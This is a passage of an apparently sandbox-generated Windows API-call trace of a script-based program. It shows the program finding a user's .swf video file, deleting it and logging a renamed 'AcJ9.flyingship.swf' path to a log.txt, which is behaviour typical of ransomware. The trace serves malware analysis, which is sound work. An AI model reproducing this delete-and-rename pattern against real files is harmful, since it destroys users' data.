[0199.084] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.084] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.084] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.084] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.085] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.085] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFilePart=0x0) returned 0x3b [0199.085] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1b8e6e40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0x90ae18 [0199.085] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\acj9.swf")) returned 1 [0199.087] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1b8e6e40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0 [0199.087] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.090] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.090] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.090] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.090] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.090] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0199.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.091] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.091] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.091] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.091] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.091] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.091] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.092] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3ded, lpOverlapped=0x0) returned 1 [0199.092] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.092] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3ded, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.092] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0199.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x49) returned 0x923b28 [0199.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\n", cchWideChar=73, lpMultiByteStr=0x923b28, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 73 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.092] WriteFile (in: hFile=0x160, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x48, lpOverlapped=0x0) returned 1 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0199.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.092] CloseHandle (hObject=0x160) returned 1 [0199.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.094] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.094] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.095] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.095] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.095] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.095] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.096] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0199.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 